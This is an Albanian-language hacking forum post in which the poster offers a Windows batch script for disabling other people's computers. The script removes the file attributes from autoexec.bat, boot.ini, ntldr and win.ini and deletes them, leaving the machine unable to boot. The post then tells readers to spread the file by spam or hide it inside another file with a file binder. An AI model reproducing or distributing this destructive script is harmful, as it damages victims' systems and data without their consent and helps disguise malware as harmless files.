AHG-CREW


 
ForumGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Fike njė PC tė huaj .........

Shko poshtė 
AutoriMesazh
Abi-haCKer
Administrator
Administrator
avatar

Male
Numri i postimeve : 154
Age : 25
Registration date : 04/04/2008

MesazhTitulli: Fike njė PC tė huaj .........   Mon Jun 09, 2008 5:29 amFillimisht ,unė nuk mbajė pėrgjegjsi per dėmet qė mundė ti shkaktoni ju.
Hapim Notepadin dhe vendosim kėtė kodė:
---------------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
-----------------------------------------------------------
E ruajmė kėtė fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat
Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.
Kujdes! Mos e hapni kėtė fajll ne PC tuaj.
Tash ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder.
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://ahg-crew.4umer.com
 
Fike njė PC tė huaj .........
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
AHG-CREW :: E-Books & Tutorials-
Kėrce tek: